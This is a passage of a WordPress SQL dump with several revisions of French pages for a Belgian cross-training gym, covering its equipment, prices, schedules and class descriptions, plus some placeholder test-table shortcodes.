(330, 1, '2013-07-10 16:10:46', '2013-07-10 16:10:46', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-10 16:10:46', '2013-07-10 16:10:46', '', 22, 'http://www.crosstrainingcenter.be/22-revision-30/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(154, 1, '2013-06-23 14:07:38', '2013-06-23 14:07:38', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]	\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style:dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 14:07:38', '2013-06-23 14:07:38', '', 11, 'http://www.crosstrainingcenter.be/?p=154', 0, 'revision', '', 0),
(155, 1, '2013-07-03 15:41:06', '2013-07-03 15:41:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:41:06', '2013-07-03 15:41:06', '', 11, 'http://www.crosstrainingcenter.be/?p=155', 0, 'revision', '', 0),
(156, 1, '2013-07-03 15:52:51', '2013-07-03 15:52:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"left|right|right|right|right|right\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:52:51', '2013-07-03 15:52:51', '', 11, 'http://www.crosstrainingcenter.be/?p=156', 0, 'revision', '', 0),
(157, 1, '2013-07-03 15:53:34', '2013-07-03 15:53:34', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 